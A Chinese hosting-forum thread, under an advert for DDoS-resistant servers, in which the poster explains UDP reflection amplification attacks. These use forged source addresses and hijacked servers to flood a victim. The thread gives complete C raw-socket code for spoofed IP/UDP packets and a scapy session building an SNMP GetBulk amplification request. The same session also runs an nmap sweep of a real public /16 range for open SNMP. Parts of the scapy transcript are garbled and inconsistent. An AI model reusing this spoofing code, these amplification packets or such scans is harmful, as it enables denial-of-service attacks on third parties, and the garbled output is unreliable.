百独托管7500 紫田网络超高转化播放器收cps[推荐]速盾CDN 免实名免备防屏蔽阿里云 爆款特卖9.9元封顶提升alexa、IP流量7Q5团队
【腾讯云】中小企福利专场【腾讯云】多款产品1折起高防 随时退换 好耶数据小飞国外网赚带你月入万元炎黄网络4H4G10M 99每月
香港带宽CN2/美国站群优惠中客数据中心 服务器租用联盟系统移动广告平台 中易企业专场腾讯云服务器2.5折九九数据 工信部正规资质
腾讯云新用户大礼包代金券高价收cpa注册量高价展示【腾讯云】2核2G/9.93起租服务器找45互联 随时退换阿里云 短信服务 验证秒达

[国内信息] 真正的高防服务器,单机可抗600G真实流量攻击,打死立即退款.. [复制链接]
查看:170817 | 回复:1156

36

主题

5374

帖子

2902

积分

落伍者(两全齐美)

Rank: 2

贡献
2797
鲜花
2
注册时间
2010-1-15

落伍手机绑定

 楼主| 发表于 2021-10-27 09:16:49 | 显示全部楼层 来自 中国云南文山壮族苗族自治州
放大攻击原理
很多协议在响应包处理时,要远大于请求包,一个字节的请求十个字的响应,十个字节的请求一百个字的响应,这就是UDP反射放大攻击最根本的原理。

而且,最重要的一点,UDP是不稳定的,不需要请求建立连接的
那么我就有点想法了

使用SOCKRAW,伪造UDP头和IP头,是否让目标流量返回给目标自己呢?事实上 我可以一点流量都接收不到,而目标在收到请求后需要放大还要将响应返回给自己。
另外一种用法,我搜集到了很多这种服务器(当做肉鸡),我伪造UDP头和IP头,伪造为我要攻击的目标,那么这些服务器在接收到我发送的数据后,所有的响应信息全部都会返回到目标IP去,这样也可以达到攻击的效果。
正因为UDP协议是可以伪造的,所以企业在溯源时很难找到攻击者是谁。
如今DDoS产业已经泛滥,技术成本极低,黑产链已经相当的完善和成熟,各个人员的分工,资源获取,集中管控,需求中介,简易化操作工具,方便快速的发起攻击,已经成为黑产界最喜爱的方式之一。

发送原始UDP封包 实现
/*
使用IP头包含选项

创建原始套接字之后,再打开IP_HDRINCL 选项,即可在IP头中封装自己的协议,而不是仅仅使用系统预定义的协议。
一般可以使用这种方法来发送UDP和TCP数据

IP数据报格式:
Version域:这4位指定了数据报的IP版本。对IPV4来说此域值为4.
IHL(IP header length 的缩写):因为IP头长度不是固定的,所以需要这4位来确定IP数据报中数据部分的开始位置。大多数IP数据报不包含此选项,所以通常IP数据报有20个字节的头长度。
Type of service(服务端类型,TOS):包含在IPV4头中,用来区分不同类型的IP数据报
Total length:这是IP数据报的总长度,IP头加数据。这个域是16位(2字节)长,所以IP数据报大小的理论最大值是65535字节。然而数据报的长度很少有超过1500字节的。
Identification域:用来表示已发送的IPV4封包。通常,系统每发送一次封包就增加一次这个值。
Falgs和Fragment offset域:当IPV4分包被分割为较小的包时使用这2个域。DF代表不要分割(dont fragment),这是一个给路由器的命令,告诉他们不要分割此数据报,因为目标主机没有能力将它们恢复回来(例如:机器在启动时)。MF代表更多的分割(More Fragments)。
Time to live(生存时间,TTL)域:包含TTL域是为了确保数据报不会永远呆在网络里打圈。每当数据报被路由器处理时,这个域就会减1,如果减到0,此数据报就会被丢弃。
Protocol域:当IP数据报到达目的地时才使用此域,它指定了IP数据报的数据部分将要传递给哪个传输层协议,例如,值6表示数据部分要被传递给TCP,值17表示数据部分要被传递给UDP。
Header checksum 域:头校验和帮助路由器检测接收到的IP数据报中的位错误。


Source address 和 Destianation address域:指定此数据报的源IP地址和目的IP地址。
Options域:选项域是一个长度可变的域,它包含了可选的信息。最大值是40字节。

*/

#include "pch.h"
#include <iostream>
#include <WinSock2.h>
#include <ws2ipdef.h>
#include <process.h>
#pragma warning(disable:4996)
#pragma comment(lib,"ws2_32.lib")

typedef struct _IPHeader {
        u_char VIHL; //版本和首部长度 各占4bit
        u_char ToS; //服务类型
        u_short TotalLen; //总长度
        u_short ID; //标识号
        u_short Frag_Flags; //片偏移量
        u_char TTL; //生存时间
        u_char Protocol; //协议
        u_short Checksum; //首部校验和
        ULONG SrcIP;
        ULONG DestIP;
        //struct in_addr SrcIP; //源IP地址
        //struct in_addr DestIP; //目的地址
}IPHDR, *PIPHDR;


/*UDP头*/
typedef struct _udpheader {
        USHORT sourcePort; //来源端口
        USHORT destinationPort;//目标端口
        USHORT len;//封包长度
        USHORT checkSum;//校验和
}UDP_HDR,*PUDP_HDR;


/*
因为UDP是不可靠协议,所以计算校验和是可选的。
和IP的校验和不同,UDP的校验和除了包含UDP的字节外,还包含IP头中的几个域。
计算UDP校验和所需的额外的域成为伪头。UDP校验和基于如下几个域:
(针对ipv4)
32位的源IP地址
32位的目的IP地址
8位0域
8位协议与
16位UDP长度
16位源端口号
16位目的端口号
16位UDP长度
16位UDP校验和(0)
UDP静荷(payload)
*/

//计算校验和
WORD checkSum(WORD* wBuff, int nSize) {
        DWORD dwSum = 0;;
        //将数据以WORD为单位累加到wSum
        while (nSize > 1) {
                dwSum += *wBuff++;
                nSize -= sizeof(WORD);
        }

        //若出现最后还剩一个字节继续与前面结果相加(也就是为奇数的情况)。
        if (nSize) {
                dwSum += *(BYTE*)wBuff++;
        }
        while (dwSum >> 16) { //如果有高16位,将一直与低16位相加
                dwSum = (dwSum >> 16) + (dwSum & 0xFFFF);
        }
        //取反
        return (WORD)(~dwSum);
}



//计算UDP校验和
void ComputeUdpPseudoHeaderCchecksum(IPHDR * pIphdr, UDP_HDR * pUdphdr, char * payload, int payloadlen) {
        char buff[1024] = { 0 };
        char *ptr = buff;

        int checksumlen = 0;
        ULONG zero = 0;

        //源IP地址
        memcpy_s(ptr, sizeof(pIphdr->SrcIP),&pIphdr->SrcIP, sizeof(pIphdr->SrcIP));
        ptr += sizeof(pIphdr->SrcIP);
        checksumlen += sizeof(pIphdr->SrcIP);

        //目的IP地址
        memcpy_s(ptr, sizeof(pIphdr->DestIP), &pIphdr->DestIP, sizeof(pIphdr->DestIP));
        ptr += sizeof(pIphdr->DestIP);
        checksumlen += sizeof(pIphdr->DestIP);



        //8位0
        memcpy_s(ptr, 1, &zero, 1);
        ptr += 1;
        checksumlen += 1;



        //协议
        memcpy_s(ptr, sizeof(pIphdr->Protocol), &pIphdr->Protocol, sizeof(pIphdr->Protocol));
        ptr += sizeof(pIphdr->Protocol);
        checksumlen += sizeof(pIphdr->Protocol);






        //UDP长度
        memcpy_s(ptr, sizeof(pUdphdr->len), &pUdphdr->len, sizeof(pUdphdr->len));
        ptr += sizeof(pUdphdr->len);
        checksumlen += sizeof(pUdphdr->len);

        //UDP源端口
        memcpy_s(ptr, sizeof(pUdphdr->sourcePort), &pUdphdr->sourcePort, sizeof(pUdphdr->sourcePort));
        ptr += sizeof(pUdphdr->sourcePort);
        checksumlen += sizeof(pUdphdr->sourcePort);


        //UDP目的端口
        memcpy_s(ptr, sizeof(pUdphdr->destinationPort), &pUdphdr->destinationPort, sizeof(pUdphdr->destinationPort));
        ptr += sizeof(pUdphdr->destinationPort);
        checksumlen += sizeof(pUdphdr->destinationPort);

        //又是UDP长度
        memcpy_s(ptr, sizeof(pUdphdr->len), &pUdphdr->len, sizeof(pUdphdr->len));
        ptr += sizeof(pUdphdr->len);
        checksumlen += sizeof(pUdphdr->len);

        //16位的UDP校验和,置为0
        memcpy_s(ptr, sizeof(USHORT), &zero, sizeof(USHORT));
        ptr += sizeof(USHORT);
        checksumlen += sizeof(USHORT);

        //净荷
        memcpy_s(ptr, payloadlen, payload, payloadlen);
        ptr += payloadlen;
        checksumlen += payloadlen;

        //补齐到下一个16位边界
        for (int i = 0; i < payloadlen%2; i++) {
                *ptr = 0;
                ptr++;
                checksumlen++;
        }

        pUdphdr->checkSum = checkSum((WORD*)buff, checksumlen);
}

//原始套接字 接收UDP封包
unsigned int WINAPI recvThread(PVOID lpParam) {
        SOCKET s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);


        SOCKADDR_IN sin;
        sin.sin_family = AF_INET;
        sin.sin_port = ntohs(4567);
        sin.sin_addr.S_un.S_addr = inet_addr("192.168.0.5");

        if (::bind(s, (SOCKADDR *)&sin, sizeof(sin)) == SOCKET_ERROR) {
                printf_s("绑定出错%d\n", GetLastError());
                closesocket(s);
                return 1;
        }


        char sz[256] = { 0 };
        SOCKADDR_IN addrRemote;
        int nLen = sizeof(addrRemote);
        printf_s("准备接收\n");
        int nRet = recvfrom(s, sz, 256, 0, (sockaddr*)&addrRemote, &nLen);
        if (nRet > 0){
                printf_s("来自ip:%s:%d,内容:%s \n", inet_ntoa(addrRemote.sin_addr), htons(addrRemote.sin_port), sz);
        }
        printf_s("接收线程结束");
        return 0;
}

//原始套接字 发送udp封包
int main()
{
        WSADATA wsaData;
        WSAStartup(MAKEWORD(2, 2), &wsaData);

        //先开始接收线程
        _beginthreadex(NULL, 0, recvThread, NULL, 0, 0);

        char Msg[] = "哈哈哈哈";
        int nMsgLen = sizeof(Msg);

        SOCKET sSend = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
        if (sSend == INVALID_SOCKET) {
                printf_s("请管理员运行\n");
                return -1;
        }

        BOOL bIncl = TRUE;
        if (setsockopt(sSend, IPPROTO_IP, IP_HDRINCL, (char*)&bIncl, sizeof(bIncl)) == SOCKET_ERROR) {
                printf_s("设置失败 %d\n",WSAGetLastError());
                closesocket(sSend);
                return -1;
        }


        char buff[1024] = { 0 };

        //ip头
        IPHDR* pIphdr = (IPHDR*)buff;
        pIphdr->VIHL = (4 << 4 | (sizeof(IPHDR) / sizeof(ULONG)));
        pIphdr->TotalLen = htons(sizeof(IPHDR) + sizeof(UDP_HDR) + nMsgLen);
        pIphdr->TTL = 128;
        pIphdr->Protocol = IPPROTO_UDP;
        pIphdr->SrcIP = inet_addr("192.168.0.5");//做测试 所以都是我
        pIphdr->DestIP = inet_addr("192.168.0.5");
        pIphdr->Checksum = checkSum((USHORT*)pIphdr, sizeof(IPHDR));


        //UDP头
        UDP_HDR* pUdphdr = (UDP_HDR*)(buff + sizeof(IPHDR));
        pUdphdr->sourcePort = htons(8888);
        pUdphdr->destinationPort = htons(4567);
        pUdphdr->len = htons(sizeof(UDP_HDR) + nMsgLen);
        pUdphdr->checkSum = 0;
        char* pPayload = buff + sizeof(IPHDR) + sizeof(UDP_HDR);
        memcpy_s(pPayload, 1024 - sizeof(IPHDR) - sizeof(UDP_HDR), Msg, nMsgLen);
        ComputeUdpPseudoHeaderCchecksum(pIphdr, pUdphdr, pPayload, nMsgLen);
       

        //设置目的地址 要和UDP头中相同
        SOCKADDR_IN sin;
        sin.sin_family = AF_INET;
        sin.sin_port = htons(4567);
        sin.sin_addr.S_un.S_addr = inet_addr("192.168.0.5");

        int nRet = sendto(sSend, buff, nMsgLen + sizeof(IPHDR) + sizeof(UDP_HDR), 0, (sockaddr*)&sin, sizeof(sin));
        if (nRet == SOCKET_ERROR) {
                printf_s("发送失败\n");
        }
        printf_s("发送完成\n");
        Sleep(10000);
        closesocket(sSend);
        WSACleanup();
}
顶尖网络安全公司,提供T级定制防护,多层防火墙同步清洗,全网DDOS防御超6000G,为您的发展保驾护航。Www.kehuayun.Com
回复 支持 反对

使用道具 举报

36

主题

5374

帖子

2902

积分

落伍者(两全齐美)

Rank: 2

贡献
2797
鲜花
2
注册时间
2010-1-15

落伍手机绑定

 楼主| 发表于 2021-10-28 10:11:48 | 显示全部楼层 来自 中国云南文山壮族苗族自治州
SNMP(Simple Network Management Protocol ):简单网络管理协议
SNMP主要工作原理:通过一台客户端机器向一个被管理的设备发出查询请求获取这台设备当前运行状态的检测等情况,网络监控一般是基于SNMP与Agent。
即:向管理的目标发送指令进行配置设置;网络监控:网络运行状态的监视

在SNMP的服务中,(被监控设备)端口UDP 161为主动查询请求;162端口为监控方在固定时间内受监控端向监控端自动发送查询请求。
同时管理信息数据库(MIB)是一个信息存储库,包含管理代理中的有关配置和性能的数据,按照不同分类(类似树形图),包含分属不同组的多个数据对象(库的设置还需要按照相应格式来进行书写)

应用模型:

SNMP是基于TCP/IP协议族的网络管理标准,是一种在IP网络中管理网络节点(如服务器、工作站、路由器、交换机等)的标准协议。SNMP能够使网络管理员提高网络管理效能,及时发现并解决网络问题以及规划网络的增长。网络管理员还可以通过SNMP接收网络节点的通知消息以及告警事件报告等来获知网络出现的问题。

SNMP管理的网络主要由三部分组成:

被管理的设备
SNMP代理
网络管理系统(NMS)
它们之间的关系如右图所示。

网络中被管理的每一个设备都存在一个管理信息库(MIB)用于收集并储存管理信息。通过SNMP协议,NMS能获取这些信息。被管理设备,又称为网络单元或网络节点,可以是支持SNMP协议的路由器、交换机、服务器或者主机等等。
SNMP代理是被管理设备上的一个网络管理软件模块,拥有本地设备的相关管理信息,并用于将它们转换成与SNMP兼容的格式,传递给NMS。
NMS运行应用程序来实现监控被管理设备的功能。另外,NMS还为网络管理提供大量的处理程序及必须的储存资源。
顶尖网络安全公司,提供T级定制防护,多层防火墙同步清洗,全网DDOS防御超6000G,为您的发展保驾护航。Www.kehuayun.Com
回复 支持 反对

使用道具 举报

36

主题

5374

帖子

2902

积分

落伍者(两全齐美)

Rank: 2

贡献
2797
鲜花
2
注册时间
2010-1-15

落伍手机绑定

 楼主| 发表于 2021-10-29 09:54:47 | 显示全部楼层 来自 中国云南文山壮族苗族自治州
................
顶尖网络安全公司,提供T级定制防护,多层防火墙同步清洗,全网DDOS防御超6000G,为您的发展保驾护航。Www.kehuayun.Com
回复

使用道具 举报

36

主题

5374

帖子

2902

积分

落伍者(两全齐美)

Rank: 2

贡献
2797
鲜花
2
注册时间
2010-1-15

落伍手机绑定

 楼主| 发表于 2021-11-1 10:38:28 | 显示全部楼层 来自 中国云南文山壮族苗族自治州
........
顶尖网络安全公司,提供T级定制防护,多层防火墙同步清洗,全网DDOS防御超6000G,为您的发展保驾护航。Www.kehuayun.Com
回复

使用道具 举报

36

主题

5374

帖子

2902

积分

落伍者(两全齐美)

Rank: 2

贡献
2797
鲜花
2
注册时间
2010-1-15

落伍手机绑定

 楼主| 发表于 2021-11-2 09:53:20 | 显示全部楼层 来自 中国云南文山壮族苗族自治州
简单网络管理协议(SNMP)是一种广泛用于监测健康和网络设备(如路由器)福利协议,计算机设备甚至设备如UPS。简单网络管理协议是一套用来实现SNMP v1应用SNMP v2c和SNMP V3使用IPv4和IPv6。该套件包括:

命令行应用程序:

从一个SNMP的设备能够检索信息,使用单一的请求(snmpget,snmpgetnext),或多个请求(snmpwalk命令,snmptable,snmpdelta)。

操纵一个SNMP功能的设备配置信息(snmpset)。

获取一个固定的信息收集从一个SNMP功能的设备(snmpdf,snmpnetstat,snmpstatus)。

MIB OID数字和文本形式之间的转换,并显示MIB的内容和结构(snmptranslate)。

一个图形化的MIB浏览器(tkmib),使用TK / Perl。

一个接收SNMP通知后台应用(snmptrapd)。选择通知可以记录(日志、NT事件日志,或纯文本文件),转到另一个SNMP管理系统,或通过外部应用程序。

为响应SNMP查询信息管理一个可扩展的代理(snmpd)。这包括一个广泛的MIB信息模块的内置支持,可以使用动态加载的模块扩展,外部脚本和命令,以及SNMP复用(中)和扩展代理协议(协议)。

为开发新的SNMP应用程序库,用C和Perl APIs。

简单网络管理协议是可用于许多UNIX和类UNIX操作系统和微软Windows。注意:功能可以根据操作系统的不同而有所不同。具体到你的平台的信息请参阅自述文件。

该文档部分包含命令行工具、安装、配置等的详细信息。

如果你是新的一般网络SNMP或SNMP,那么一个好的开始是教程部分。

下载部分包含各种平台的源代码和二进制文件。

请看我们的项目开发的网页位于SourceForge以及。

开始运行“appwiz.cpl”----->添加/删除windows组件----->管理和监控工具----->简单网络管理协议(SNMP)----->完成

开始运行“services.msc”----->SNMP Service

                              SNMP Trap Service

SNMP Service 的属性(本地计算机)------>接收团体名称(添加)------>团体权限:只读;团体名称:asdasd------>接受来自这些SNMP 数据包(添加)------>1.1.1.1------>应用,确定

root@K:~# ifconfig

192.168.1.116

root@K:~# scapy

WARNING: No route found for IPv6 destination :: (no default route?)

Welcome to Scapy (2.3.2)

>>> i=IP()

>>> i.dst="192.168.1.124"

>>> i.display()

###[ IP ]###

  version = 4

  ihl = None

  tos = 0x0

  len = None

  id = 1

  flags=

  frag= 0

  ttl = 64

  proto = tcp

  chksum = None

  src = 192.168.1.116

  dst = 192.168.1.124

>>> u=UDP

>>> u.display()

###[ UDP ]###

  sport=domain

  dport=domain

  len=None

  chksum=None

>>> u.dport=161

>>> u.sport=161

>>> s=SNMP()

>>> s.display()

###[ SNMP ]###

  version= v2c

  community= 'public'

  \PDU\

   |###[ SNMPget ]###

   |  id= 0

   |  error= no_error

   |  error_index= 0

   |  \varbindlist\

>>> s.community="asdasd"

###[ SNMPbulk ]###

  id= 0

  non_repeaters= 0

  max_repetitions= 0

  \varbindlist\

>>> b.max_repetitions=100

>>> b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASNI_OID('1.3.6.1.2.1.19.1.3'))]

>>> s.displa()

###[ SNMP ]###

  version= v2c

  community= 'asdasd'

  \PDU\

   |###[ SNMPget ]###

   |  id= 0

   |  error= no_error

   |  error_index= 0

   |  \varbindlist\

>>> s.PDU=b

>>> s.display()

###[ SNMP ]###

  version= v2c

  community= 'asdasd'

  \PDU\

   |###[ SNMPbulk ]###

   |  id= 0

   |  max_repeaters= 0

   |  max_repetitions = 100

   |  \varbindlist\

   |   |###[ SNMPvarbind ]###

   |   |  oid=ASN1_OID('1.3.6.1.2.1.1')

   |   |  value= <ASNI_NULL[0]>

   |   |###[ SNMPvarbind ]###

   |   |  oid= ASNI_OID('1.3.6.1.2.1.19.1.3'))]

   |   |  value= <ASNI_NULL[0]>

>>> u.display()

###[ UDP ]###

  sport= snmp

  dport= snmp

  len=None

  chksum=None

>>> r=(i/u/s)

>>> r.display()

###[ IP ]###

  version = 4

  ihl = None

  tos = 0x0

  len = None

  id = 1

  flags=

  frag= 0

  ttl = 64

  proto = tcp

  chksum = None

  src = 192.168.1.116

  dst = 192.168.1.124

###[ UDP ]###

  sport=domain

  dport=domain

  len=None

  chksum=None

###[ SNMP ]###

  version= v2c

  community= 'asdasd'

  \PDU\

   |###[ SNMPbulk ]###

   |  id= 0

   |  max_repeaters= 0

   |  max_repetitions = 100

   |  \varbindlist\

   |   |###[ SNMPvarbind ]###

   |   |  oid=ASN1_OID('1.3.6.1.2.1.1')

   |   |  value= <ASNI_NULL[0]>

   |   |###[ SNMPvarbind ]###

   |   |  oid= ASNI_OID('1.3.6.1.2.1.19.1.3'))]

   |   |  value= <ASNI_NULL[0]>

>>> sr1(r)

>>> s.display()

###[ SNMP ]###

  version= v2c

  community= 'asdasd'

  \PDU\

   |###[ SNMPbulk ]###

   |  id= 0

   |  max_repeaters= 0

   |  max_repetitions = 100

   |  \varbindlist\

   |   |###[ SNMPvarbind ]###

   |   |  oid=ASN1_OID('1.3.6.1.2.1.1')

   |   |  value= <ASNI_NULL[0]>

   |   |###[ SNMPvarbind ]###

   |   |  oid= ASNI_OID('1.3.6.1.2.1.19.1.3'))]

   |   |  value= <ASNI_NULL[0]>

>>> b.SNMPbulk()

>>> b.display()

###[ SNMPbulk ]###

  id= 0

  non_repeaters= 0

  max_repetitions= 0

  \varbindlist\

>>> b.max_petitions=200

>>> b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASNI_OID('1.3.6.1.2.1.19.1.3'))]

>>> b.display()

###[ SNMPbulk ]###

  id= 0

  max_repeaters= 0

  max_repetitions = 100

  \varbindlist\

   |###[ SNMPvarbind ]###

   |  oid=ASN1_OID('1.3.6.1.2.1.1')

   |  value= <ASNI_NULL[0]>

   |###[ SNMPvarbind ]###

   |  oid= ASNI_OID('1.3.6.1.2.1.19.1.3'))]

   |  value= <ASNI_NULL[0]>

>>> s.PDU=b

>>> s.display()

###[ SNMP ]###

  version= v2c

  community= 'asdasd'

  \PDU\

   |###[ SNMPbulk ]###

   |  id= 0

   |  max_repeaters= 0

   |  max_repetitions = 100

   |  \varbindlist\

   |   |###[ SNMPvarbind ]###

   |   |  oid=ASN1_OID('1.3.6.1.2.1.1')

   |   |  value= <ASNI_NULL[0]>

   |   |###[ SNMPvarbind ]###

   |   |  oid= ASNI_OID('1.3.6.1.2.1.19.1.3'))]

   |   |  value= <ASNI_NULL[0]>

>>> r=(i/u/s)

###[ IP ]###

  version = 4

  ihl = None

  tos = 0x0

  len = None

  id = 1

  flags=

  frag= 0

  ttl = 64

  proto = tcp

  chksum = None

  src = 192.168.1.116

  dst = 192.168.1.124

###[ UDP ]###

  sport=domain

  dport=domain

  len=None

  chksum=None

###[ SNMP ]###

  version= v2c

  community= 'asdasd'

  \PDU\

   |###[ SNMPbulk ]###

   |  id= 0

   |  max_repeaters= 0

   |  max_repetitions = 100

   |  \varbindlist\

   |   |###[ SNMPvarbind ]###

   |   |  oid=ASN1_OID('1.3.6.1.2.1.1')

   |   |  value= <ASNI_NULL[0]>

   |   |###[ SNMPvarbind ]###

   |   |  oid= ASNI_OID('1.3.6.1.2.1.19.1.3'))]

   |   |  value= <ASNI_NULL[0]>

>>> sr1(r)

root@K:~# nmap -sU -p161 202.106.0.0/16

尽量不要向外网开放snmp服务
顶尖网络安全公司,提供T级定制防护,多层防火墙同步清洗,全网DDOS防御超6000G,为您的发展保驾护航。Www.kehuayun.Com
回复 支持 反对

使用道具 举报

36

主题

5374

帖子

2902

积分

落伍者(两全齐美)

Rank: 2

贡献
2797
鲜花
2
注册时间
2010-1-15

落伍手机绑定

 楼主| 发表于 2021-11-3 10:00:01 | 显示全部楼层 来自 中国云南文山壮族苗族自治州
..........
顶尖网络安全公司,提供T级定制防护,多层防火墙同步清洗,全网DDOS防御超6000G,为您的发展保驾护航。Www.kehuayun.Com
回复

使用道具 举报

36

主题

5374

帖子

2902

积分

落伍者(两全齐美)

Rank: 2

贡献
2797
鲜花
2
注册时间
2010-1-15

落伍手机绑定

 楼主| 发表于 2021-11-4 09:35:59 | 显示全部楼层 来自 中国云南文山壮族苗族自治州
...........
顶尖网络安全公司,提供T级定制防护,多层防火墙同步清洗,全网DDOS防御超6000G,为您的发展保驾护航。Www.kehuayun.Com
回复

使用道具 举报

36

主题

5374

帖子

2902

积分

落伍者(两全齐美)

Rank: 2

贡献
2797
鲜花
2
注册时间
2010-1-15

落伍手机绑定

 楼主| 发表于 2021-11-5 10:15:40 | 显示全部楼层 来自 中国云南文山壮族苗族自治州
............
顶尖网络安全公司,提供T级定制防护,多层防火墙同步清洗,全网DDOS防御超6000G,为您的发展保驾护航。Www.kehuayun.Com
回复

使用道具 举报

36

主题

5374

帖子

2902

积分

落伍者(两全齐美)

Rank: 2

贡献
2797
鲜花
2
注册时间
2010-1-15

落伍手机绑定

 楼主| 发表于 2021-11-8 10:40:05 | 显示全部楼层 来自 中国云南文山壮族苗族自治州
............
顶尖网络安全公司,提供T级定制防护,多层防火墙同步清洗,全网DDOS防御超6000G,为您的发展保驾护航。Www.kehuayun.Com
回复

使用道具 举报

36

主题

5374

帖子

2902

积分

落伍者(两全齐美)

Rank: 2

贡献
2797
鲜花
2
注册时间
2010-1-15

落伍手机绑定

 楼主| 发表于 2021-11-9 10:08:09 | 显示全部楼层 来自 中国云南文山壮族苗族自治州
...........
顶尖网络安全公司,提供T级定制防护,多层防火墙同步清洗,全网DDOS防御超6000G,为您的发展保驾护航。Www.kehuayun.Com
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

论坛客服/商务合作/投诉举报:2171544 (QQ)
落伍者创建于2001/03/14,本站内容均为会员发表,并不代表落伍立场!
拒绝任何人以任何形式在本论坛发表与中华人民共和国法律相抵触的言论!
落伍官方微信:2030286 邮箱:(djfsys@gmail.com|tech@im286.com)
© 2001-2014

浙公网安备 33060302000191号

浙ICP备11034705号 BBS专项电子公告通信管[2010]226号

  落伍法律顾问: ITlaw-庄毅雄

手机版|找回帐号|不能发帖?|Archiver|落伍者

GMT+8, 2024-11-25 20:48 , Processed in 0.060560 second(s), 25 queries , Gzip On.

返回顶部